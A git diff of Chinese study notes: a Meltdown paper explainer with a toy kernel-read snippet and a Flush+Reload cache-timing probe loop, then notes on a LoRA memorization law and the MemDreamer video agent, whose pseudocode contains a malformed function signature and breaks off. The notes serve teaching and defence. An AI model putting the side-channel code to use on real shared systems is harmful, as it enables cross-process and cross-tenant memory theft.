月全球 IT 进入「紧急补丁周」,Linux 突然上了 **KPTI**(Kernel Page Table Isolation),Windows 上了 **KVA Shadow**,macOS 做了类似改造 +- 为什么打内核补丁后,数据库、容器运行时、高频 `syscall` 的服务**明显变慢**——不是补丁写坏了,是为堵 Meltdown 付的**性能税** +- 为什么云厂商要强调「同宿主机邻居进程」不再被默认信任,多租户隔离要重新审计 +- 为什么 CPU 厂商除了打微码,还要在新一代芯片里改硬件缓解——软件补丁救不了所有变体 +- 为什么安全圈把「侧信道」从冷门论文话题变成**每台服务器的必修项** + +论文强调:Meltdown **不依赖任何软件漏洞**,破坏的是**地址空间隔离**这一安全地基;在受影响系统上,攻击者可读其他进程或云虚拟机内存,**无需任何权限或特权**。 + +## 核心概念 + +### 1. 架构状态 vs 微架构状态 + +CPU 有两层「状态」需要区分: + +| 层面 | 含义 | 攻击者能否直接读 | +|------|------|------------------| +| **架构状态**(architectural) | 程序员可见的寄存器、内存、程序计数器 | 非法读取会被撤销,你看不到「名义上的」秘密 | +| **微架构状态**(microarchitectural) | 缓存行是否载入、TLB、分支预测历史等 | 可通过计时、功耗等侧信道间接观测 | + +Meltdown 的核心矛盾:**乱序执行撤销了架构层面的非法读取,却没有完全抹掉微架构层面的缓存痕迹。** + +### 2. 乱序执行(Out-of-Order Execution) + +现代 CPU 不会严格按程序顺序一条一条执行。为了填满流水线,会在**依赖还没算完**时先执行后面「看起来独立」的指令——例如「读内核地址」这条 load,可能在「权限检查是否通过」之前就进入内存子系统。 + +类比:电梯门还没开,职员的手已经伸进抽屉——架构上最终会作废这次读取,但微架构层面**数据可能已被取进缓存**。 + +### 3. 瞬态指令序列(Transient Instruction Sequence) + +在乱序窗口里执行、随后因异常或权限失败而被丢弃的指令,叫 **transient instructions**。它们在架构语义上「从未发生」,却可能: + +1. 从**用户不可访问的内核地址**读出秘密字节 `value` +2. 用 `value` 计算 `probe[value * 4096]` 并访问该地址 +3. 把「秘密是多少」编码成「probe 数组的哪一行被载入缓存」 + +### 4. Flush+Reload 侧信道 + +**Flush+Reload** 是 Meltdown 选用的缓存攻击技术(Yarom & Falkner, USENIX Security 2014): + +1. **Flush**:用 `clflush` 把探测数组从缓存清掉 +2. **Trigger**:触发瞬态序列,让 CPU 暗中访问 `probe[secret]` +3. **Reload**:逐个探测 `probe[i]` 的访问时间——**缓存命中快、未命中慢**,最热的行号就是 `secret` + +论文报告在 Intel Core i7-6700K 上可达约 **503 KB/s** 的泄漏速率。 + +### 5. KAISER / KPTI 缓解 + +**KAISER**(Kernel Address Isolation to have Side-channels Efficiently Removed)把内核页表与用户页表拆开:用户态运行时**根本映射不到内核地址**,乱序 load 够不着目标。Linux 实现叫 **KPTI**;论文在披露窗口内与 Windows、macOS 厂商协同验证,这是当时最有效的软件缓解。 + +## 攻击三步走(论文 Figure 4–5) + +```text +Step 1 选择目标内核地址 addr,尝试读取 *addr → 得到秘密字节 value + (乱序执行可能在页错误/权限异常「提交」前完成 load) + +Step 2 瞬态序列:access(probe[value * 4096]) + → 把 value 写入缓存状态(微架构 covert channel 发送端) + +Step 3 Flush+Reload 扫描 probe[0..255] + → 最热的页号 = value(covert channel 接收端) +``` + +重复 Step 1–3,对内核地址空间逐字节扫描,即可 dump 内核映射(含指向物理内存的窗口)。 + +## 实践案例 + +### 案例 1:玩具示例——三行 C 在干什么 + +论文 Section 3 的极简示意(教学用,现代系统已缓解,不可直接当武器): + +```c +// addr:攻击者想读的内核虚拟地址(例如通过 /proc/self/mem 等途径获得线索) +// probe:攻击者分配的大数组,256 页,每页至少 4096 字节(一页一缓存行策略) +// value:从 addr 读出的秘密字节(0–255) + +value = *addr; // Step 1:非法读内核;乱序下可能先完成 +probe[value * 4096]; // Step 2:用秘密值触碰 probe 某一页 + // Step 3:随后用 Flush+Reload 在外层循环恢复 value +``` + +**逐行解释**: + +- `*addr` 在架构上应触发 **#GP 页保护异常** 或页错误,结果不应提交到 `value` +- 乱序窗口里,load 可能**已经**把数据搬进内部寄存器,并沿依赖链执行 `probe[...]` +- 异常处理撤销寄存器,但 **`probe[value*4096]` 对应缓存行可能已变热** +- 外层 `for (i=0; i<256; i++)` 配合 `rdtsc` 计时,找出最热页号 → 重建 `value` + +### 案例 2:Flush+Reload 探测循环 + +攻击的「接收端」通常是测量缓存的循环,而非「一行就读内核」: + +```c +#define CACHE_LINE 512 // 典型 x86 缓存行 64B;教学常放大 stride 减少预取干扰 +#define THRESHOLD 80 // 命中/未命中的周期阈值,需校准 + +uint8_t probe[256 * CACHE_LINE]; +int leaked_byte = -1; + +void flush_probe_array(void) { + for (int i = 0; i < 256; i++) + _mm_clflush(&probe[i * CACHE_LINE]); // 清空所有探测行 +} + +int reload_probe(void) { + for (int i = 0; i < 256; i++) { + uint64_t t0 = __rdtsc(); + volatile uint8_t junk = probe[i * CACHE_LINE]; + uint64_t t1 = __rdtsc(); + if (t1 - t0 < THRESHOLD) + return i; // 这一行刚被瞬态序列碰过 + } + return -1; +} + +// 典型一轮:flush → 触发含 *addr 与 probe[value*4096] 的瞬态序列 → reload_probe() +``` + +**要点**: + +- `_mm_clflush` / `clflush` 把指定缓存行逐出,保证测量前起点一致 +- `__rdtsc` 读时间戳计数器,**命中约数十周期,未命中可达数百周期** +- `volatile` 防止编译器把探测访问优化掉 +- 实际 PoC 还需**吞掉或延迟异常**(如 `try/catch` 信号处理、Intel TSX 事务内存等),否则瞬态窗口太短;论文讨论了多种实现细节 + +### 案例 3:KPTI 如何让 Step 1 够不着内核 + +Linux KPTI 在每次 **syscall / 中断 / 异常** 进出内核时切换页表: + +```bash +# 查看本机是否启用 KPTI(较新内核) +grep -i pti /sys/devices/system/cpu/vulnerabilities/meltdown +# 常见输出:Mitigation: PTI + +# 打补丁前后 syscall 密集场景(示意,因 CPU/内核版本而异) +# 打补丁前:getpid() 约数百纳秒 +# 打补丁后:同机器可能涨到 1–2 微秒量级,高 QPS 服务 TPS 可降几个点 +``` + +**解释**: + +- 用户态页表里**没有内核映射**,乱序 load 目标地址时更早失败或读不到真实内核内容 +- 代价是每次进内核多一次页表切换与 TLB 刷新——Redis、PostgreSQL、serverless 冷路径都会感受到 +- 后来 PCID 等硬件特性减轻部分开销,但 **安全与速度的 trade-off** 至今仍在 + +### 案例 4:云虚拟机与「邻居不可信」 + +论文在公有云实例上验证:同一物理机上的普通 VM,理论上可读宿主机内核映射片段。 + +```text +┌─────────────┐ ┌─────────────┐ +│ 租户 A VM │ │ 租户 B VM │ 同一物理 CPU +│ 用户进程 │ │ 用户进程 │ +└──────┬──────┘ └──────┬──────┘ + │ Meltdown 泄漏 │ + └────────┬────────┘ + 宿主机内核映射 +``` + +Meltdown 说明:**Hypervisor + 内核隔离** 之上,还要假设 CPU 不乱序泄密;多租户平台除打补丁外,需审计是否仍共享易受影响的旧 CPU 池。 + +## Meltdown vs Spectre(对照表) + +| 维度 | Meltdown | Spectre | +|------|----------|---------| +| 利用机制 | **乱序执行**,权限检查延迟 | **推测执行**,分支预测错误 | +| 主要目标 | **内核 / 物理内存映射** | 受害进程**自己的**地址空间 | +| 是否需要诱骗受害代码 | 否,攻击者主动读内核地址 | 是,需构造投机路径 | +| 关键缓解 | KPTI / KAISER、微码 | retpoline、IBRS、编译器屏障等 | +| 与软件漏洞关系 | **无** | **无**(受害者逻辑可完全正确) | + +两者共同点:**架构上撤销的操作,微架构缓存状态仍可能泄漏。** + +## 踩过的坑 + +1. **Meltdown ≠ 软件提权漏洞**:不是「内核有个 buffer overflow」,而是 CPU 实现与隔离假设不一致。 + +2. **补丁 ≠ 所有侧信道消失**:KPTI 主要挡 Meltdown 这条「乱序读内核」路;后续 MDS、L1TF、LazyFP 等变体仍需微码与继续隔离,不能 2018 年打一次就躺平。 + +3. **容器 ≠ 额外硬件隔离**:Docker 默认共享宿主机内核;Meltdown 时代说明「命名空间」之上还要信任 **KPTI 是否到位**。 + +4. **不要低估 syscall 密集场景**:静态网站几乎无感;高 QPS 数据库、消息队列必须重新做容量规划。 + +5. **ARM 也受影响**:初版讨论以 x86 为主,但论文与后续公告表明多种 ARM 核心同样需缓解——不是「Intel 独有」。 + +## 适用 vs 不适用场景 + +**适用**: + +- 理解现代 CPU **乱序执行 + 缓存** 为何构成安全面 +- 解释 2018 年前后 OS / 虚拟化 / 云架构的紧急改造动机 +- 学习侧信道思维:「作废的读取仍可重建秘密」 +- 评估旧硬件池是否仍应留在多租户生产环境 + +**不适用**: + +- 把本文当「一步步入侵教程」——实战利用受法律与伦理约束,且现代已缓解系统需组合多种技巧 +- 用 Meltdown 解释**纯用户态栈溢出**——那是另一类漏洞模型 +- 在 **已启用 KPTI + 新微码 + 新 CPU** 的环境假设「和 2018 年一样好利用」 +- 替代形式化验证工具——Meltdown 是**打破假设**的案例,不是证明工具 + +## 历史小故事(可跳过) + +- **1967 年**:Tomasulo 算法让乱序执行在工程上可行——性能大奖,五十年后变成安全噩梦的伏笔。 +- **2017 年底**:Graz 理工大学团队与 Google Project Zero 的 Jann Horn **独立**发现同类问题。 +- **2018 年 1 月 3 日**:Meltdown 与 Spectre 同期披露,[meltdownattack.com](https://meltdownattack.com) 上线,全球紧急补丁。 +- **2018 年 8 月**:论文正式发表于 USENIX Security 2018,页 973–990。 +- **之后数年**:Intel 微码、硬件级缓解、MDS/L1TF 等变体研究——故事没在一月结束。 + +## 学到什么 + +1. **内存隔离是安全的地基**——Meltdown 证明硬件实现可以无声击穿「用户碰不到内核」。 +2. **性能优化与安全常常对打**——乱序执行是刚需,副作用必须用页表隔离、微码、新硬件持续买单。 +3. **侧信道的本质是测「痕迹」**——不必拿到寄存器本身,缓存时间差就足够重建秘密字节。 +4. **责任披露 + 全行业协同**——OS、云、芯片厂同一窗口修补,是「基础设施级」漏洞的应对模板。 +5. **读论文要分清架构与微架构**——安全假设若只写在 ISA 手册上,而攻击活在硅片实现里,就会反复踩坑。 + +## 延伸阅读 + +- 同日姊妹篇:[[spectre-attack-2018]] — 推测执行与边界检查绕过 +- 本仓库姊妹笔记:[[lipp-meltdown-2018]] — 另一版 Meltdown 学习笔记 +- Flush+Reload 基础:Yarom & Falkner, USENIX Security 2014 +- KAISER 原理:Gruss et al., USENIX Security 2017(后演进为 KPTI) +- 官方站点:[meltdownattack.com](https://meltdownattack.com) +- USENIX 演讲页:[usenix.org/conference/usenixsecurity18/presentation/lipp](https://www.usenix.org/conference/usenixsecurity18/presentation/lipp) + +## 参考文献 + +```bibtex +@inproceedings{lipp2018meltdown, + title = {Meltdown: Reading Kernel Memory from User Space}, + author = {Moritz Lipp and Michael Schwarz and Daniel Gruss and Thomas Prescher + and Werner Haas and Anders Fogh and Jann Horn and Stefan Mangard + and Paul Kocher and Daniel Genkin and Yuval Yarom and Mike Hamburg}, + booktitle = {27th USENIX Security Symposium (USENIX Security 18)}, + year = {2018}, + pages = {973--990}, + url = {https://meltdownattack.com/meltdown.pdf} +} +``` diff --git a/src/content/docs/papers/mem-ft-lora.md b/src/content/docs/papers/mem-ft-lora.md new file mode 100644 index 000000000..7ca282a72 --- /dev/null +++ b/src/content/docs/papers/mem-ft-lora.md @@ -0,0 +1,310 @@ +--- +title: How LoRA Remembers? — 参数记忆定律与 MemFT 零基础学习笔记 +来源: https://arxiv.org/abs/2605.30260 +日期: 2026-06-13 +子分类: 模型与训练 +分类: 机器学习 +provenance: pipeline-v3 +--- + +## 从日常类比开始:LoRA 像可插拔的「小抽屉」 + +想象你有一本**已经写满的大百科全书**(预训练 LLM 的固定权重)。现实里不断有新事实、新号码、新文档要记进去,但你不能每来一条就把全书重印一遍(全量微调太贵)。 + +**LoRA(Low-Rank Adaptation)** 的做法像给书页边贴一排**可替换的小抽屉**: + +- 大书本体不动,只在少数层旁边挂低秩矩阵 \(A,B\),更新量 \(\Delta W = BA\)。 +- 每条要「写入」的知识,占用的不是整本书的页数,而是**抽屉容量**——由 rank \(r\) 和有效参数量决定。 +- 问一句 key(问题),模型应从抽屉里**一字不差**吐出 value(答案)——这叫 **exact parametric memory(精确参数记忆)**。 + +过去大家只看「微调后 QA 好不好」,像只测「能不能答对大意」。这篇论文(Xu 等,浙江大学 + 阿里巴巴,arXiv:[2605.30260](https://arxiv.org/abs/2605.30260))问的是更底层的问题: + +> **给定 rank 和要背的文本长度,LoRA 到底能可靠记住多少?平均 loss 低了,是否就等于背下来了?** + +答案分两层:**宏观**上有幂律(Parametric Memory Law);**微观**上每个 token 还要过 \(p>0.5\) 的相变门槛,否则一个错词就会**级联崩盘**。 + +--- + +## 是什么 + +| 项目 | 内容 | +|------|------| +| 标题 | How LoRA Remembers? A Parametric Memory Law for LLM Finetuning | +| 机构 | 浙江大学、阿里巴巴 | +| 任务 | 精确参数记忆:\(f_\theta(q^{(i)}) = a^{(i)}\),贪婪解码下 verbatim 复现 | +| 探针 | 用 LoRA 作为**可控容量探针**,扫描 rank \(r\) 与答案长度 \(\ell\) | +| 核心公式 | Parametric Memory Law:\(\Delta\mathcal{L}(r,\ell) = C \cdot r^{\alpha} \cdot \ell^{-\beta} + b\) | +| 相变阈值 | \(P_{\text{target}} > 0.5 \Leftrightarrow \mathcal{L}_{\text{crit}} = \ln 2 \approx 0.693\) | +| 方法 | **MemFT**:把训练预算重分配给「还没过门槛」的 stubborn tokens | +| 代码 | [github.com/zjunlp/ParametricMemoryLaw](https://github.com/zjunlp/ParametricMemoryLaw) | + +论文把 LoRA 从「省显存的微调技巧」重新框定为:**latent space 里可插拔的记忆单元**,并给出可预测的容量–参数–长度关系。 + +--- + +## 为什么重要 + +不理解这篇论文,下面几件事很难讲清楚: + +- 为什么 LoRA rank 加到某个值后,**loss 还在降、准确率却卡住**——不是 bug,是 **Loss–Accuracy Misalignment(损失–准确率错位)** +- 为什么「平均 cross-entropy 很低」仍可能**整段背不出来**——少数 \(p<0.5\) 的 stubborn token 会在自回归生成里**一处错、后面全错** +- 为什么 continual learning / 知识更新要同时看 **参数量预算** 和 **序列长度**——二者通过幂律耦合,不是独立旋钮 +- 为什么 MemFT 能在**相同 rank** 下超过标准 SFT——它不再平均用力,而是专攻「还没过 \(\mathcal{L}_{\text{crit}}\)」的位置 +- 为什么 RAG / ICL 保证 verbatim,而 parametric memory 天然更难——信息写进权重,没有「原文 fetch」这条捷径 + +一句话:**LoRA 能记多少、怎样才算「真的记住了」,这篇论文给了可度量的物理定律,而不只是经验调 rank。** + +--- + +## 核心概念 + +### 1. Exact Parametric Memory(精确参数记忆) + +数据集 \(\mathcal{D} = \{(q^{(i)}, a^{(i)})\}\):`q` 是唯一 key,`a` 是要背的内容。推理时**看不到** \(a\),只能靠 \(\Delta\theta\)(LoRA 增量)存信息。 + +- 所有 token 级指标**只统计答案 token**,问题 token 仅作 conditioning。 +- 评估用 **greedy decoding**:\(\hat{a}_t = \arg\max_v p_\theta(v \mid q, a_{ 0\)) +- **要背的越长** → 单位参数能分到的「记忆带宽」越少 → \(\Delta\mathcal{L}\) 越小(\(\beta > 0\)) + +在 Llama-3.1-8B-Instruct、Qwen3-8B-Instruct 上,Long-context 混合任务 \(R^2 \approx 0.98+\),PhoneBook 短 KV 任务同样拟合良好——说明定律对**语义文本、随机 token、长短上下文**都稳健。 + +**宏观定律告诉你「容量趋势」,但不保证每个 token 都背下来了。** + +### 3. Loss–Accuracy Misalignment(损失–准确率错位) + +关键反直觉现象:**平均 loss 接近 0,token 准确率仍可能接近 0**。 + +原因:cross-entropy 对所有 token **平均**。简单 token 已经 \(p \approx 1\),把平均值拉得很低,掩盖少数位置长期 \(p < 0.5\) 的 **stubborn tokens(顽固 token)**。 + +在自回归生成里,只要**最早失败位置** \(i^\*\) 前一个 token 没背稳,后面上下文被污染,整段 collapse——论文报告 Spearman \(\rho \approx 0.908\):最早 stubborn 位置 tightly bounds \(i^\*\)。 + +### 4. Deterministic Phase Transition(确定性相变) + +对每个目标 token,设 \(P_{\text{target}}\) 为正确 token 的预测概率。 + +| 相 | 条件 | 含义 | +|----|------|------| +| **Disordered(无序相)** | \(P_{\text{target}} < 0.5\),即 \(\mathcal{L}_t > \ln 2\) | 正确 token 不是最大概率候选,贪婪解码可能选错 | +| **Ordered(有序相)** | \(P_{\text{target}} > 0.5\),即 \(\mathcal{L}_t < \ln 2\) | 正确 token **保证**是 argmax,贪婪解码必对 | + +临界 loss: + +\[ +\mathcal{L}_{\text{crit}} = -\log(0.5) = \ln 2 \approx 0.693 +\] + +**\(p > 0.5\) 是 verbatim recall 的充分条件**(在 greedy 下)。低于阈值不是「稍微不确定」,而是**记忆尚未锁定**,级联失败风险陡增。 + +Parametric Memory Law 描述「整体 loss 能降多少」;相变解释「降下来的 loss 何时真正变成准确率」。 + +### 5. MemFT(Memorization-oriented Fine-Tuning) + +标准 SFT 对所有 token 等权优化,浪费梯度在**已经 ordered** 的 easy tokens 上。 + +MemFT 使用加权目标: + +\[ +\mathcal{L}_{\text{MemFT}}(\theta) = \frac{\sum_{t \in \mathcal{M}} w_t \, \mathcal{L}_t(\theta)}{\sum_{t \in \mathcal{M}} w_t + \varepsilon} +\] + +两种主要变体: + +| 方法 | 权重 \(w_t\) | 思想 | +|------|-------------|------| +| **MemFT-OT** | \(\mathbf{1}[\mathcal{L}_t > \mathcal{L}_{\text{crit}}]\) | 只训练 sub-threshold token,零额外超参 | +| **MemFT-SW** | 在 OT 基础上加 soft threshold + 围绕首个错误位置的 spatial sliding | 聚焦瓶颈邻域,缓解局部卡死 | + +实验(Long-Context Memorization Stress Test):同 rank 下 MemFT-OT 在 Llama-3.1-8B 最高档 rank 达到 **100% token accuracy**,显著高于 SFT 的 94.7%;PhoneBook 上 EM 准确率同样大幅提升。 + +--- + +## 代码示例 1:判断 token 是否进入「有序相」 + +下面用 NumPy 演示相变阈值——把每个位置的 cross-entropy 映射到 \(P_{\text{target}}\),再标记是否已「记忆锁定」: + +```python +import numpy as np + +L_crit = np.log(2) # ≈ 0.693 + +def memory_phase(per_token_loss: np.ndarray) -> dict: + """per_token_loss: 每个答案 token 的 cross-entropy(自然对数)""" + p_target = np.exp(-per_token_loss) + ordered = per_token_loss < L_crit # P_target > 0.5 + stubborn = ~ordered + return { + "p_target": p_target, + "ordered_mask": ordered, + "stubborn_indices": np.where(stubborn)[0].tolist(), + "mean_loss": float(per_token_loss.mean()), + "token_accuracy_if_greedy": float(ordered.all()), # 全 ordered 才保证整段 verbatim + } + +# 模拟:多数 token 已学会,但 index 7 长期卡在无序相 +losses = np.array([0.05, 0.08, 0.12, 0.15, 0.20, 0.18, 0.22, 0.95, 0.10, 0.09]) +report = memory_phase(losses) + +print(f"平均 loss: {report['mean_loss']:.3f}") # 看起来不错 +print(f"stubborn 位置: {report['stubborn_indices']}") # [7] +print(f"整段 greedy 能否 verbatim: {report['token_accuracy_if_greedy']}") # False +``` + +输出说明:**平均 loss 仅 0.215,但一个 stubborn token 就足以让整段记忆在生成时失败**——这就是 Loss–Accuracy Misalignment 的微观来源。 + +--- + +## 代码示例 2:MemFT-OT 加权 loss(PyTorch 风格) + +MemFT-OT 把梯度集中在 \(\mathcal{L}_t > \mathcal{L}_{\text{crit}}\) 的 token 上: + +```python +import torch +import torch.nn.functional as F + +L_CRIT = 0.6931471805599453 # ln(2) + +def memft_ot_loss(logits: torch.Tensor, labels: torch.Tensor, ignore_index: int = -100) -> torch.Tensor: + """ + logits: [batch, seq, vocab] + labels: [batch, seq],问题 token 位置标 ignore_index + """ + b, s, v = logits.shape + flat_logits = logits.view(-1, v) + flat_labels = labels.view(-1) + + per_token = F.cross_entropy(flat_logits, flat_labels, reduction="none", ignore_index=ignore_index) + mask = flat_labels != ignore_index + + # 仅对未过相变阈值的 token 计权 + w = (per_token > L_CRIT).float() * mask.float() + weighted = w * per_token + + denom = w.sum().clamp_min(1e-8) + return weighted.sum() / denom + +# 对比:标准 SFT 对所有答案 token 等权 +def sft_loss(logits: torch.Tensor, labels: torch.Tensor, ignore_index: int = -100) -> torch.Tensor: + return F.cross_entropy( + logits.view(-1, logits.size(-1)), + labels.view(-1), + ignore_index=ignore_index, + ) +``` + +训练循环里,可在每步 forward 后统计 `stubborn ratio = (L_t > L_crit).mean()`,观察 MemFT 是否把 stubborn token 比例快速压到 0——这与论文中「redirect parameter budget」的叙事一致。 + +--- + +## 代码示例 3:Parametric Memory Law 的 log–log 拟合(概念验证) + +用 scipy 在 \((r, \ell)\) 网格上拟合 \(\Delta\mathcal{L}\),验证幂律形状(实验需自行跑 LoRA 扫描收集数据): + +```python +import numpy as np +from scipy.optimize import curve_fit + +def memory_law(r, ell, C, alpha, beta, b): + return C * (r ** alpha) * (ell ** (-beta)) + b + +# ranks, lengths, delta_L 来自多次 LoRA 微调实验 +ranks = np.array([1, 2, 4, 8, 16, 32], dtype=float) +lengths = np.array([128, 256, 512, 1024], dtype=float) + +# 构造网格:每个 (r, ell) 测一次相对基座的 loss 下降 +R, L = np.meshgrid(ranks, lengths, indexing="ij") +# delta_L[i,j] = loss_base - loss_lora (示例占位,需替换为真实测量) +delta_L = np.random.uniform(0.1, 2.0, size=R.shape) + +def flat_model(x, C, alpha, beta, b): + r, ell = x + return memory_law(r, ell, C, alpha, beta, b) + +popt, _ = curve_fit( + flat_model, + (R.ravel(), L.ravel()), + delta_L.ravel(), + p0=[1.0, 0.5, 0.5, 0.0], + bounds=([0, 0, 0, -np.inf], [np.inf, 5, 5, np.inf]), +) +C, alpha, beta, b = popt +print(f"ΔL ≈ {C:.4f} * r^{alpha:.3f} * ℓ^(-{beta:.3f}) + {b:.4f}") +``` + +论文报告 \(\alpha, \beta\) 在不同模型与数据混合下稳定——这意味着你可以**在正式微调前估算**:给定目标文本长度和可用 rank,loss 还能降多少、是否值得加 rank 或拆短序列。 + +--- + +## 实验设置速览 + +| 维度 | 设置 | +|------|------| +| 基座模型 | Llama-3.1-8B-Instruct、Qwen3-8B-Instruct | +| 长上下文任务 | Long-context Memorization Stress Test(LongBench 与随机 token 混合,r0–r100) | +| 短 KV 任务 | PhoneBook(name → number,大量短条目) | +| LoRA | 作为 latent space 记忆探针,扫描多档 rank | +| 对比方法 | SFT vs MemFT-OT vs MemFT-SW | + +PhoneBook 考察「很多短记忆」;Long-context 考察「单条很长 verbatim」——两者互补,定律在两端都成立。 + +--- + +## 与相关路线的关系 + +```text +非参数记忆 参数记忆(本文) +───────────────────────────────────────────────── +ICL / RAG / 外部向量库 vs LoRA / 权重写入 +推理时读上下文 vs 推理时无原文,靠 Δθ +verbatim 容易(直接取回) vs verbatim 难,需过 p>0.5 相变 +上下文窗口、注意力稀释 vs 容量受 rank×长度幂律约束 +``` + +与 Chinchilla 的「算力–参数–数据最优比」不同,本文回答的是 **finetune 阶段 LoRA 作为记忆模块的容量律**——二者可组合:先知道预训练规模律,再在部署时用 Parametric Memory Law 规划知识更新预算。 + +--- + +## 实践启示 + +1. **别只用平均 loss 判断「背会了没有」**——检查 sub-threshold token 比例和首个失败位置。 +2. **加 rank 有递减收益**——幂律告诉你何时进入饱和区;MemFT 则在**固定 rank** 下挖潜。 +3. **长文本记忆更吃参数**——\(\ell^{-\beta}\) 意味着同样 rank 下,背 4 倍长文本比线性想象更难。 +4. **训练策略**:对 stubborn token 加权(MemFT-OT 最简单)比盲目延长 epoch 更有效。 +5. **评估协议**:exact memory 任务应报告 **token-level accuracy + greedy decoding**,而不只是 perplexity。 + +--- + +## 局限与开放问题 + +- 定律在文中所列模型与任务上验证,**更大模型、MoE、多模态 LoRA** 是否同指数仍需扩展。 +- MemFT-SW 引入 sliding window 等超参,OT 变体零超参但 SW 在部分设置更优——工程上需按任务选择。 +- 论文聚焦 **verbatim parametric memory**;与 RAG 混合、instruction following 的交互未完全展开。 +- 代码仓库标注将发布——复现时以官方实现为准。 + +--- + +## 一句话总结 + +**LoRA 记住东西的方式,可以用幂律刻画容量(Parametric Memory Law),用 \(p>0.5\) 刻画每个 token 是否真正锁定(确定性相变);MemFT 则把训练火力从「已经会了的 token」转向 stubborn token,在相同参数预算下提高 verbatim 记忆成功率。** + +--- + +## 延伸阅读 + +- 论文 HTML:[arxiv.org/html/2605.30260v1](https://arxiv.org/html/2605.30260v1) +- 代码:[github.com/zjunlp/ParametricMemoryLaw](https://github.com/zjunlp/ParametricMemoryLaw) +- 相关:[[demystifying-data-org]](数据组织与训练效率)、[[llmsurgeon-data-mixture]](数据混合与微调) diff --git a/src/content/docs/papers/memdreamer.md b/src/content/docs/papers/memdreamer.md new file mode 100644 index 000000000..4935e4827 --- /dev/null +++ b/src/content/docs/papers/memdreamer.md @@ -0,0 +1,273 @@ +--- +title: MemDreamer +来源: https://arxiv.org/abs/2606.07512 +日期: 2026-06-13 +分类: Agent +子分类: 智能体与 LLM +provenance: pipeline-v3 +--- + +# MemDreamer:分层图记忆 + 智能体检索,解决长视频理解问题 + +## 问题:为什么长视频这么难理解? + +想象一下这个场景:你有一部三个小时的电影,要回答"主角在第二幕中段为什么对配角发火"。 + +你不可能把整部三个小时的电影在脑海里同时回放。那样会混乱、会遗忘、会找不到重点。 + +正确的做法是: + +1. **分场景记住关键事件**(感知) +2. **回答问题时,只回想相关片段**(推理) +3. **像查笔记一样在记忆里搜索线索**(检索) + +MemDreamer 做的事情,就是让 AI 学会这套方法。 + +--- + +## 核心问题:Token 爆炸 + 注意力稀释 + +现有的 Vision-Language Model(视觉-语言模型,比如 GPT-4o、Claude 的多模态版本)处理长视频时有一个根本性问题: + +> 视频是连续的帧。一小时 30fps 的视频 = 108,000 帧。每帧都要编码成 token 输入模型,token 数量会指数级膨胀,模型"注意力"被稀释到无法聚焦。 + +用一个比喻:就像让一个人同时读一万本书来回答一个关于其中某一页的问题。 + +--- + +## 核心思路:分离"感知"和"推理" + +MemDreamer 的关键创新是**把"看视频"和"想问题"拆成两个独立阶段**: + +| 阶段 | 做什么 | 类比 | +|------|--------|------| +| **感知(Perception)** | 视频流进来时,不断提炼、压缩、建索引 | 读书时做笔记、画思维导图 | +| **推理(Reasoning)** | 回答问题时,从笔记中检索相关信息来思考 | 考试时翻笔记找答案 | + +这两个阶段之间通过一个**分层图记忆(Hierarchical Graph Memory)**连接。 + +--- + +## 分层图记忆:三层结构 + +MemDreamer 把视频信息组织成一个三层的图结构(Graph = 节点 + 边): + +``` +层级 1(底层):基础图 Foundation Graph + ├── 每一帧/每个场景是一个节点 + ├── 节点之间用边连接,表示时空关系("前一秒发生了这个")和因果关系("因为他被骂了,所以生气了") + └── 这是最详细的信息层 + +层级 2(中层):摘要图 Summary Graph + ├── 把相邻的基础图节点合并成"场景片段" + ├── 例如:"第一幕开场 - 主角走进办公室 - 和秘书打招呼" 合并为一个节点 + └── 保留关键事件,丢弃细碎帧信息 + +层级 3(顶层):大纲图 Outline Graph + ├── 最高级别的抽象 + ├── 比如:"第一幕:建立关系"、"第二幕:冲突爆发"、"第三幕:和解" + └── 类似一本书的目录 +``` + +这个结构的妙处在于:**从顶层查到底层,像导航一样逐层下钻**。 + +--- + +## 智能体检索:O-R-A 循环 + +当用户提问时(比如"主角为什么在第 45 分钟生气?"),MemDreamer 不是一次性把所有内容喂给模型,而是用一个**智能体(Agent)**来做检索: + +``` +Observation(观察)→ Reason(推理)→ Action(行动) + ↑ │ + └──────────────────────────────────┘ + (循环执行) +``` + +每一轮循环: + +1. **观察当前已有的信息** +2. **推理:我需要知道什么?下一步该查什么?** +3. **行动:调用工具(搜索节点、遍历边、跳到更高层或更低层)** + +这个过程持续进行,直到智能体认为自己收集到了足够的信息来回答问题。 + +--- + +## 代码示例 + +### 示例 1:构建分层图记忆(伪代码) + +```python +# 第一步:从视频流中逐帧提取特征并构建基础图节点 +class FoundationGraphNode: + def __init__(self, frame_id, visual_features, timestamp): + self.id = frame_id + self.features = visual_features # 视觉特征向量 + self.timestamp = timestamp # 时间戳 + self.edges = [] # 连接到其他节点的边 + +# 第二步:将相邻的基础图节点合并为场景摘要(中层) +def merge_to_scene_foundation_nodes, scene_size=30): + scenes = [] + for i in range(0, len(nodes), scene_size): + chunk = nodes[i : i + scene_size] + # 将一 chunk 的视觉特征压缩为一个摘要向量 + summary = compress(chunk.features) + scene = SummaryGraphNode( + id=f"scene_{i}", + summary=summary, + time_range=(chunk[0].timestamp, chunk[-1].timestamp), + children=chunk # 保留对原始节点的引用 + ) + scenes.append(scene) + return scenes + +# 第三步:生成顶层大纲(高层抽象) +def generate_outline(scenes): + outline = [] + for scene_group in group_by_act(scenes): # 按"幕"分组 + outline.append(OutlineNode( + id=f"act_{len(outline)}", + title=extract_act_title(scene_group), # 从场景中提炼标题 + scenes=scene_group + )) + return outline +``` + +### 示例 2:智能体 O-R-A 检索循环(伪代码) + +```python +class AgenticRetriever: + def __init__(self, outline, summary_graph, foundation_graph, reasoner): + self.outline = outline + self.summary_graph = summary_graph + self.foundation_graph = foundation_graph + self.reasoner = reasoner # 负责推理的模型 + self.knowledge = [] # 累积的已知信息 + + def retrieve(self, question): + """从大纲层开始,逐步下钻检索""" + self.knowledge.append(self._get_outline_summary()) + + while not self._is_enough(question): + # Observation:看看现在知道了什么 + current_state = self._summarize_knowledge() + + # Reason:推理下一步该查什么 + plan = self.reasoner.step( + question=question, + current_state=current_state, + knowledge=self.knowledge + ) + # plan 输出类似: {"action": "search_scene", "target": "scene_45"} + + # Action:执行检索动作 + result = self._execute_action(plan) + self.knowledge.append(result) + + # 收集够了,回答问题 + return self.reasoner.answer(question, self.knowledge) + + def _execute_action(self, plan): + action = plan["action"] + target = plan["target"] + + if action == "search_scene": + # 在中层图中搜索对应的场景节点 + scene = self.summary_graph.search(target) + return scene.summary + + elif action == "drill_down": + # 下钻到基础图,看这个场景的每一帧细节 + scene = self.summary_graph.find(target) + return [node.features for node in scene.children] + + elif action == "traverse_causal": + # 沿着因果关系边查找 + node = self.foundation_graph.find(target) + return 